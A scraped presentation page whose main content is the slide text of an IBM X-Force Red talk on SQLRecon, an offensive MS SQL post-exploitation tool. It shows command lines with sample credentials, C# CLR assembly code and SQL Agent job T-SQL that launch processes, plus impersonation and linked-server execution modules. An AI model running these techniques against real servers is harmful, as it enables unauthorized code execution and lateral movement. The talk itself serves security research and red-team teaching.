Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 

Recently uploaded (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

Abusing MS SQL Using SQLRecon

  • 1. Abusing MS SQL Using SQLRecon Sanjiv Kawa Adversary Simulation, IBM X-Force Red May 6, 2022
  • 2. whoami? IBM Security / © 2022 IBM Corporation 2 Role » Adversary Simulation, IBM X-Force Red Hobbies
  • 3. Agenda 3 IBM Security / © 2022 IBM Corporation Introducing SQLRecon 3 min Demo 1: Basic Modules 2 min Demo 2: Impersonation Attacks 4 min Demo 3: Attacking Linked SQL Servers 4 min Development Roadmap 1 min Conclusion & Questions 1 min
  • 4. Introducing SQLRecon IBM Security / © 2022 IBM Corporation 4
  • 5. What’s currently available? 5 IBM Security / © 2022 IBM Corporation A good amount of offensive MS SQL tools already exists – metasploit – crackmapexec – PowerUpSQL
  • 6. How did this research come about? 6 IBM Security / © 2022 IBM Corporation Like most tooling … to solve a problem encountered on an engagement Also to address the MS SQL C# post-exploitation tooling gap – Modernize the approach – Works with a diverse set of C2 frameworks – execute-assembly and InlineExecute-Assembly compatible
  • 7. Why bother attacking MS SQL? 7 IBM Security / © 2022 IBM Corporation Often overlooked Often misconfigured BuiltinUsers can connect to MS SQL servers by default, and: – Execute basic SQL commands – Determine rights via user mapping/roles -> impersonation attacks – UNC path injection. Creds or SMB relay -> code execution – Piggyback off rights to compromise linked servers
  • 8. Demo Time IBM Security / © 2022 IBM Corporation 8
  • 9. Demo 1: Basic Modules IBM Security / © 2022 IBM Corporation 9
  • 10. 10 IBM Security / © 2022 IBM Corporation 1. Set an authentication context 2. Supply a module SQLRecon.exe -a Windows –s SQL01 –d msdb –m whoami SQLRecon.exe -a Local –s SQL01 –d msdb –u sa –p Password123 –m whoami SQLRecon.exe -a Azure –r domain.com –d msdb –u jsmith –p Password123 –m whoami Usage
  • 11. 11 IBM Security / © 2022 IBM Corporation Demo Context
  • 12. 12 IBM Security / © 2022 IBM Corporation query whoami databases tables search smb Plenty more … (SQLRecon.exe –h) Basic Modules
  • 13. 13 IBM Security / © 2022 IBM Corporation Privilege Check
  • 14. 14 IBM Security / © 2022 IBM Corporation whoami
  • 15. 15 IBM Security / © 2022 IBM Corporation whoami ctd.
  • 16. 16 IBM Security / © 2022 IBM Corporation databases
  • 17. 17 IBM Security / © 2022 IBM Corporation tables
  • 18. 18 IBM Security / © 2022 IBM Corporation search
  • 19. 19 IBM Security / © 2022 IBM Corporation query
  • 20. 20 IBM Security / © 2022 IBM Corporation smb
  • 21. Demo 2: Impersonation Attacks IBM Security / © 2022 IBM Corporation 21
  • 22. 22 IBM Security / © 2022 IBM Corporation Demo Configuration - Impersonation Impersonate is a special permission Enables a user or group to: - Operate with the permissions of another user; - As well as their own permissions.
  • 23. 23 IBM Security / © 2022 IBM Corporation SQLRecon.exe -a Windows –s SQL02 –d master –m impersonate SQLRecon.exe -a Windows –s SQL02 –d master –m iwhoami –i sa Impersonation
  • 24. 24 IBM Security / © 2022 IBM Corporation impersonate
  • 25. 25 IBM Security / © 2022 IBM Corporation using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void BaconTime () { } } https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 Custom CLR Assemblies
  • 26. 26 IBM Security / © 2022 IBM Corporation using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void BaconTime () { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } } https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 Custom CLR Assemblies
  • 27. 27 IBM Security / © 2022 IBM Corporation ienableclr
  • 28. 28 IBM Security / © 2022 IBM Corporation Upload DLL to disk
  • 29. 29 IBM Security / © 2022 IBM Corporation iclr
  • 30. 30 IBM Security / © 2022 IBM Corporation idisableclr
  • 31. 31 IBM Security / © 2022 IBM Corporation Caveat: - SQL Agent must be running - Does not work with SQL Server Express edition - Works with: Developer, Standard and Enterprise editions Agent Jobs
  • 32. 32 IBM Security / © 2022 IBM Corporation iagentstatus
  • 33. 33 IBM Security / © 2022 IBM Corporation EXEC dbo.sp_add_job @job_name = 'test_ps_job1'; EXEC sp_add_jobstep @job_name = 'test_ps_job1', @step_name = 'test_ps_name1', @subsystem = 'PowerShell', @command = 'powershell.exe start-process notepad', @retry_attempts = 1, @retry_interval = 5; EXEC dbo.sp_add_jobserver @job_name = 'test_ps_job1'; EXEC dbo.sp_start_job 'test_ps_job1'; WAITFOR DELAY '00:00:05'; EXEC dbo.sp_delete_job @job_name = 'test_ps_job1'; Agent Jobs
  • 34. 34 IBM Security / © 2022 IBM Corporation iagentcmd
  • 35. Demo 3: Attacking Linked SQL Servers IBM Security / © 2022 IBM Corporation 35
  • 36. 36 IBM Security / © 2022 IBM Corporation Demo Configuration - Links SQL02 might be segmented from the network you’re on A link could exist from SQL01 -> SQL02 Leverage SQL01 to issue queries on SQL02
  • 37. 37 IBM Security / © 2022 IBM Corporation SQLRecon.exe -a Windows –s SQL01 –d master –m links SQLRecon.exe -a Windows –s SQL01 –d master –m lwhoami –l SQL02 Linked SQL Servers
  • 38. 38 IBM Security / © 2022 IBM Corporation links SQLRecon.exe -a Windows –s SQL01 –d master –m links
  • 39. 39 IBM Security / © 2022 IBM Corporation lwhoami
  • 40. 40 IBM Security / © 2022 IBM Corporation ldatabases
  • 41. 41 IBM Security / © 2022 IBM Corporation ltables
  • 42. 42 IBM Security / © 2022 IBM Corporation lenableole
  • 43. 43 IBM Security / © 2022 IBM Corporation lolecmd
  • 44. 44 IBM Security / © 2022 IBM Corporation ldisableole
  • 45. 45 IBM Security / © 2022 IBM Corporation lsmb
  • 46. Development Roadmap IBM Security / © 2022 IBM Corporation 46
  • 47. 47 IBM Security / © 2022 IBM Corporation - Expand Command Execution Techniques To Do’s Execution Technique Standard Impersonation Linked xp_cmdshell ✅ ✅ ✅ OLE Automation ✅ ✅ ✅ Custom CLR Assemblies ✅ ✅ ❌ Agent Jobs ✅ ✅ ❌
  • 48. Conclusion IBM Security / © 2022 IBM Corporation 48
  • 49. 49 IBM Security / © 2022 IBM Corporation Address the MS SQL C# post-exploitation tooling gap Helps operators using C2 frameworks perform MS SQL attacks Conclusion & Questions @sanjivkawa github.com/skahwah/SQLRecon